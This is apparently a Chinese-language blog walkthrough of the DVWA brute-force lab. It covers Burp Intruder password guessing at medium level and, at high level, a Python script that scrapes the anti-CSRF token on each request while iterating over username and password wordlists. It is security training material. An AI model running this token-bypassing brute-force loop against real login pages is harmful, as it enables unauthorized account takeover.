首页 > 其他分享 >DVWA Brute Force爆破

DVWA Brute Force爆破

时间:2023-04-21 14:01:15浏览次数:39  
标签:username Force url Brute DVWA header token burp password

1、介绍

该功能演示的是账号密码场景,对密码的爆破,对账号是已知的。

本章仅进行简单记录,相关技术在其他文章整理。比如burp使用,php代码,python脚本。

2、简单型

没有做任何处理,可以爆破掉,但实际也可以sql注入。(burp爆破由中等演示,sql注入在sql注入模块演示)

3、中等

做了sql注入预防,burp爆掉。

(1)设置等级为medium中等。

(2)输入正确的username,和错误的password。提交。

(3)burp监听,对关键请求发送到intruder模块。

所谓的关键请求,一般是指携带参数提交的请求,可以基于此在burp中直接查找,也可以先在浏览器F12确定提交过程中发出的请求,锁定关键请求后再在burp中查找。

(4)设置password为攻击点,设置payload集合

4、高等

做了token机制,需要脚本,从每次响应中读取token作为下一请求的参数。以python脚本为例。

from bs4 import BeautifulSoup
import requests

header={
    'User-Agent':'',
    'Cookie':''# 该cookie实际是登录dvwa的凭证
}
url = 'http://192.168.93.134/dvwa/vulnerabilities/brute/'
def get_token(url,headers):
    r = requests.get(url, headers=header)
    html = r.content.decode()
    soup = BeautifulSoup(html, "html.parser")
    user_token = soup.find_all('input')[3]["value"]
    return user_token

i=0
for admin in open(""):
    for line in open(""):
        u_token = get_token(url, header)
        username = admin.strip()
        password = line.strip()
        payload = {"username":username, "password":password, "Login":"Login", "user_token":u_token}
        i = i+1
        response = requests.get(url, params=payload, header=header)
        print(i, username,password,len(response.content.decode()))
        u_token=get_token(url,header)

5、不可能

限制失败次数,等待时间再次尝试

标签:username,Force,url,Brute,DVWA,header,token,burp,password
From: https://www.cnblogs.com/wd404/p/17340116.html

相关文章

  • dvwa文件包含
    初次使用,可能报错:这是因为没有配置远程包含1、低级别查看服务端代码,即直接包含(2)远程包含需要先对php进行配置,php.ini文件,配置后需要重启服务2、中级别过滤http://等几个字符串,替换为””,通过双写绕过3、高级别要求file协议但是本地仍然可以执行,file://d://1.txt4、......
  • vm+centos+lnmp部署dvwa
    1、说明本次安装环境:VMware-player-16.0.0-16894299CentOS-7-x86_64-Minimal-2009.isoNginx:Web服务器,本文以Nginx1.17.7为例。MariaDB:数据库,本文以MariaDB10.4.8为例。PHP:脚本语言,本文以PHP7.2.22为例。上述环境参考:vm+centos部署lnmp–学习狗2、安装(1)dvwa......
  • phpstudy安装dvwa
    1、环境MicrosoftWindows[版本10.0.19043.2130]phpstudy_x64_8.1.1.3.exeMySQL5.7.26Nginx1.15.11php7.3.4nts2、下载解压,将其放入phpstudy的网站根目录下,并将目录重命名为dvwa方便访问3、初次启动(1)开启nginx和mysql(2)访问127.0.0.1/dvwa/,(3)赋值重名名后,不需要......
  • CodeForces 34B Sale
    B- SaleTimeLimit:2000MS     MemoryLimit:262144KB     64bitIOFormat:%I64d&%I64uSubmit Status Practice CodeForces34BDescriptionOnceBobgottoasaleofoldTVsets.Therewere n TVsetsatthatsale.TVsetwithi......
  • C. Table Decorations(Codeforces)(规律)
    C.TableDecorationstimelimitpertestmemorylimitpertestinputoutputr red, g greenand b blueballoons.Todecorateasingletableforthebanquetyo......
  • CodeForces 34A Reconnaissance 2
     Reconnaissance2TimeLimit:2000MS     MemoryLimit:262144KB     64bitIOFormat:%I64d&%I64uSubmit Status Practice CodeForces34ADescriptionn soldiersstandinacircle.Foreachsoldierhisheight ai isknown.Areco......
  • codeforces round The Monster and the Squirrel 529B (数学规律)
    TheMonsterandtheSquirrelTimeLimit: 1000MS MemoryLimit: 262144KB 64bitIOFormat: %I64d&%I64uSubmit StatusDescriptionArithemonsteralwayswakesupveryearlywiththefirstrayofthesunandthefirstthingshedoesisfeedinghersqu......
  • Codeforces Round 850 (Div. 2, based on VK Cup 2022 - Final Round) E. Monsters (h
    传送门详细题解传送门  抄的ygg代码,向在这里说一下刚开始没看懂的部分。  求答案的时候是把所有的当前为止的所有数值加起来减去一个从1开始并且公差为1的等差数列的前size项和。其中size是当前最多能用到哪个位置,满足前size项能构成1,2,3,....,sz这样的形式。  假设我们......
  • CodeForces - 610B Vika and Squares (模拟)
    CodeForces-610BVikaandSquaresTimeLimit: 2000MS MemoryLimit: 262144KB 64bitIOFormat: %I64d&%I64uSubmit StatusDescriptionVikahas n jarswithpaintsofdistinctcolors.Allthejarsarenumberedfrom 1 to n andthe......
  • CodeForces - 659C Tanya and Toys (map&模拟)
    CodeForces-659CTanyaandToysTimeLimit: 1000MS MemoryLimit: 262144KB 64bitIOFormat: %I64d&%I64uSubmit StatusDescriptionInBerlandrecentlyanewcollectionoftoyswentonsale.Thiscollectionconsistsof 109 typesof......